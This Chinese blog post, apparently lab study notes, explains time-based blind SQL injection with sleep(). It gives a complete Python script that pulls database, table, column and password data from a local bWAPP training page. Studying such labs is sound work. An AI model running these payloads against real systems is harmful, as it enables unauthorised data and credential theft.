sql两个时间计算时间差_Web安全(二)SQL注入[三]

最新推荐文章于 2024-01-31 16:47:53 发布
最新推荐文章于 2024-01-31 16:47:53 发布
阅读量211 收藏
点赞数
文章标签: sql两个时间计算时间差
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39594191/article/details/111377868
版权
aeb2c7f685d97a70720448bac8fd8747.gif

点击上方蓝字关注!

注:本篇文章为个人学习笔记仅供学习交流。

8dd9823802677b350d48b149e8e59979.gif

时间盲注

通过注入特定语句,根据对页面请求的物理反馈,来判断是否注入成功,如:在SQL语句中使用sleep() 函数看加载网页的时间来判断注入点。 适用场景:通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。

原理

select * from user where id= ‘ ?’

?用户输入,替代为 4’ and sleep(3) -- ‘

实际上执行的SQL语句:

select * from user where id= ‘4’ and sleep(3) -- ‘’

当id=4存在时,休眠3秒 

当id=4不存在时,直接返回整条拼接出来的SQL是正确的就执行最后的sleep,前面错误(不存在),sleep(3)不执行。

常用函数

substr(a,b,c):从b位置开始,截取字符串a的c长度
count():计算总数
ascii():返回字符的ASCII码
length():返回字符串的长度
left(a,b):从左往右截取字符串a的前b个字符
sleep(n):将程序暂停n秒

示例

选择时间盲注

5df2cdb25d996bacbf5be77d84b3f3ac.png

正常输入可看到返回时间为1秒左右,拼接sleep函数看到时间变化了说明存在时间盲注,and前面必须是数据库里的,否则不会执行后面的and后面的命令。

19508ad022f90bf433f9209c8a5b672b.png

084da69549a5baae51cc8148120fd6e7.png

python脚本

import requestsfrom urllib.parse import quoteheaders = {    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0',    'Referer': 'http://127.0.0.1/bwapp/bwapp/sqli_15.php',    'Cookie': 'security_level=0; PHPSESSID=hlk1q0q4m2qn6d8rtnhcs0gr65'}def guset_db_len():    len_of_db = 0    print('猜解数据库长度')    for i in range(1, 6):        url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='        title = '''Man of Steel' and if(length(database())=%s,sleep(3),1)#''' % i        title = quote(title)        url = url + title        r = requests.get(url, headers=headers)        # r.elapsed.seconds计算的是从发送请求到服务端响应回来这段时间(也就是时间差),        # 发送第一个数据到收到最后一个数据之间        if (r.elapsed.seconds > 2.5):            print('length of database:', i)            len_of_db = i            continue    return len_of_dbdef guest_db_name(len_of_db):    name_db = ''    char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'    print('猜解数据库名称')    for i in range(1, len_of_db + 1):        for k in char_list:            k1 = ord(k)            url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='            title = '''Man of Steel' and if(ascii(mid(database(),%s,1))=%s,sleep(5),1)#''' % (i, ord(k))            url = url + quote(title)            r = requests.get(url, headers=headers)            if (r.elapsed.seconds > 4.5):                name_db = name_db + k                print('第%s位:%s' % (i, k))    print('name of database:', name_db)def guest_table_name_len():    len_of_tables = 0    char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,'    tables_name = ''    print('表长度的总和')    for i in range(2, 40):        url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='        title = '''Man of Steel' and if((select length(group_concat(table_name)) from information_schema.tables where table_schema='bWAPP')=%s,sleep(5),1)#''' % i        title = quote(title)        url = url + title        r = requests.get(url, headers=headers)        # r.elapsed.seconds计算的是从发送请求到服务端响应回来这段时间(也就是时间差),        # 发送第一个数据到收到最后一个数据之间        if (r.elapsed.seconds > 4.5):            print('length of tables:', i)            len_of_tables = i            continue    print('猜解数据库名称')    for i in range(1, len_of_tables + 1):        for k in char_list:            k1 = ord(k)            url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='            title = '''Man of Steel' and if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'),%s,1))=%s,sleep(5),1)#''' % (            i, k1)            title = quote(title)            url = url + title            r = requests.get(url, headers=headers)            if (r.elapsed.seconds > 4.5):                tables_name = tables_name + k                print('第%s位:%s' % (i, k))    print('name of tables:', tables_name)def guest_name_columns():    len_of_columns = 0    char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,'    columns_name = ''    print('列长度的总和')    for i in range(2, 200):        url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='        title = '''Man of Steel' and if((select length(group_concat(column_name)) from information_schema.columns where table_name='users')=%s,sleep(5),1)#''' % i        title = quote(title)        url = url + title        r = requests.get(url, headers=headers)        # r.elapsed.seconds计算的是从发送请求到服务端响应回来这段时间(也就是时间差),        # 发送第一个数据到收到最后一个数据之间        if (r.elapsed.seconds > 4.5):            print('length of columns:', i)            len_of_columns = i            continue    print('猜解列名称')    for i in range(1, len_of_columns + 1):        for k in char_list:            k1 = ord(k)            url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='            title = '''Man of Steel' and if(ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='users'),%s,1))=%s,sleep(5),1)#''' % (            i, k1)            title = quote(title)            url = url + title            r = requests.get(url, headers=headers)            if (r.elapsed.seconds > 4.5):                columns_name = columns_name + k                print('第%s位:%s' % (i, k))    print('name of columns:', columns_name)def guest_columns_content():    len_columns_content = 0    char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,1234567890'    columns_content = ''    columns_name = 'password'    print('列内容长度的总和')    for i in range(2, 400):        url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='        title = '''Man of Steel' and if((select length(group_concat(%s)) from users)=%s,sleep(5),1)#''' % (        columns_name, i)        title = quote(title)        url = url + title        r = requests.get(url, headers=headers)        # r.elapsed.seconds计算的是从发送请求到服务端响应回来这段时间(也就是时间差),        # 发送第一个数据到收到最后一个数据之间        if (r.elapsed.seconds > 4.5):            print('length of columns content:', i)            len_columns_content = i            continue    print('列的内容')    for i in range(1, len_columns_content + 1):        for k in char_list:            k1 = ord(k)            url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='            title = '''Man of Steel' and if(ascii(mid((select group_concat(%s) from users),%s,1))=%s,sleep(5),1)#''' % (            columns_name, i, k1)            title = quote(title)            url = url + title            r = requests.get(url, headers=headers)            if (r.elapsed.seconds > 4.5):                columns_content = columns_content + k                print('第%s位:%s' % (i, k))    print('columns_content:', columns_content)if __name__ == '__main__':    guest_db_name(5)    guest_table_name_len()    guest_name_columns()    guest_columns_content()

参考:CSDN——Gond19

b60724b72c307a31e2282f6be22f56be.gif

- End -

b607b23b0ba0f4cd3ecaf06143eeff42.png觉得不错,请点个在看

weixin_39594191
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
计算两个时间相差多少年月日的sql算法
11-22
计算两个时间相差多少年月日的sql算法,比如1998-1-25与2011-11-22相差的时间(用年月日表示)就可以用这个方法算出来为13年9个月28天
基于网络安全平台的SQL注入技术研究.pdf
01-04
基于网络安全平台的SQL注入技术研究是指攻击者利用SQL命令将请求的查询字符串插入Web表单递交或输入域名或页面,让后台数据库执行恶意代码的命令,并根据程序返回的结果,获取需要的数据信息。SQL注入攻击可以描述为...
sql计算两个时间差
05-28 6273
1.在表中创建了一个时间的字段,并添加一个时间c_time(2008-12-29),计算c_time距离现在的时间已经过了多少天了? sql中一般用datediff函数来表示时间差 前者now()(sql中获取当前时间的字段) 减去 后者'2008-12-29'的时间 得到的结果就是3437天 转载于:https://www.cnblogs.com/JerryTomcat/p...
sql server 计算两个时间相差(年、月、日、时、分、秒)
最新发布
goodjuan的博客
01-31 5579
select datediff(minute, 开始日期,结束日期);select datediff(second, 开始日期,结束日期);select datediff(month, 开始日期,结束日期);select datediff(hour, 开始日期,结束日期);select datediff(year, 开始日期,结束日期);select datediff(week, 开始日期,结束日期);select datediff(day, 开始日期,结束日期);
SQL求解两个时间差
Cc_Rain
10-24 1441
SELECTDATEDIFF( Second, '2009-8-25 12:15:12', '2009-9-1 7:18:20') --返回相差秒数 SELECTDATEDIFF( Minute, '2009-9-1 6:15:12', '2009-9-1 7:18:20') --返回相差分钟数 SELECTDATEDIFF( Day, '2009-8-25 12:15:12','2009-9-1...
SQL计算时间差
晓晓的天空
12-31 5万+
1,DATEDIFF函数 语法:DATEDIFF(开始时间,结束时间) 释义:DATEDIFF可以计算开始时间与结束时间时间差,结果是天数 栗子: 2,TIMESTAMPDIFF函数 语法:TIMESTAMPDIFF(时间粒度,开始时间,结束时间) 释义:(1)时间粒度参数: 2/SECOND--秒:计算开始时间与结束时间相差的秒数。 4/MINUTE--分:计算开始时间与结束时间相差多少分钟。 ...
SQL查询安全性及性能优化
03-07
SQL注入的原理 什么SQL注入SQL代码插入到应用程序的输入参数中,之后,SQL代码被传递到数据库执行。从而达到对应用程序的攻击目的。 注入原理 常见攻击方法 检测是否可以注入【检测注入点】 示例:...
deploy_model
03-22
Flask和FastAPI是两个常用的Python微型Web服务框架,它们可以帮助我们快速创建RESTful API。在Flask中,你可以定义路由规则,然后将模型预测逻辑绑定到特定的URL上。FastAPI则以其高效的性能和友好的自动文档生成受...
网站后台管理模板(21个)
02-15
6. **安全性**:确认模板遵循最佳安全实践,如防止SQL注入、XSS攻击等。 总之,后台管理模板为开发人员提供了一种快速构建专业后台界面的途径,使得他们可以专注于核心功能的开发,而不是花费大量时间在界面设计上...
mysql计算时间差函数
09-10
MySql计算两个日期的时间差函数TIMESTAMPDIFF用法,只要用一句SQL语句就可以办到了。
SQL计算timestamp的差值的方法
09-09
主要介绍了SQL计算timestamp的差值的方法的相关资料,需要的朋友可以参考下
计算2个日期,相差多少年月日的sql函数
07-22
--判断2个日期间的,年月日间隔 --举例如下: 2017-12-31~2018-01-01 = 2天 2017-01-01~2018-12-31 = 2年 2017-01-01~2018-01-01 = 1年1天 2017-06-06~2018-01-01 = 6月27天 2015-09-10~2018-10-14 = 3年1月5天 2015-09-10~2018-08-14 = 2年11月5天
数据库中计算两个时间字段的时间差
zhanglei500038的博客
05-07 4万+
1. mysql数据库表中有两个时间的字段,需要计算他们的时间差: (1)datediff函数来表示时间差。 基本语法: DATEDIFF(datepart,startdate,enddate) 说明: datepart可以指定时间单位,天,小时,分钟等,但是 经过我试验, DATEDIFF(startdate,enddate),不能指定天,时,分,秒等参数, 似乎只能计算天数差
SQL中如何计算时间差
c_hanhan的博客
08-31 9119
考试中计算考试用了多长时间,用到了计算时间差的函数,结果为时间
SQL计算两个日期的差(天、小时、分、秒)
热门推荐
wei_jie_zhang的专栏
12-30 7万+
select datediff(DAY,'2012/8/1','2012/8/20') as daysum //注解:MONTH为月、DAY为查询天、HOUR为小时、MINUTE为分钟、SECOND为秒
SQL语句计算某个时间与当前时间的差距
mcband的博客
06-05 8770
sql计算时间差
Mysql中使用SQL计算两个日期时间差
weixin_30929295的博客
01-08 747
需求说明:   1、在项目中需要计算某一个环节的持续时间及该环节进行的次数。   2、要求持续时间以分钟进行显示,并统计进行次数。 解决方式:   通过计算某一环节的开始时间与结束时间的秒数差值进行判断。 代码部分:   说明:数据库使用的是Mysql,持久层框架使用的是Mybatis。 代码如下: FLOOR((SUM(UNIX_TIMESTAMP(开始时间)-UNIX_TI...
SQL 计算两个日期间的间隔
langbin418的专栏
11-04 3494
 sql时间差2007-12-05 14:46DATEDIFF( ) 计算两个日期间的间隔。 sample: SELECT fname, lname, hire_date FROM employee WHERE DATEDIFF(year, hire_date, getdate()) > 5 查找雇佣期限超过五年的所有员工。 DATEPART( ) 返回日期或日期时间列的指定部分,包括日、月或年
web安全入门ppt课件.ppt
11-16
"Web安全入门PPT课件涵盖了Web安全的基础知识,包括Web的B/S架构,Web程序的执行过程,以及重点讲解了Web漏洞中的SQL注入问题。" Web安全是一个重要的领域,对于任何涉及Web应用程序开发、维护或管理的人来说都是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值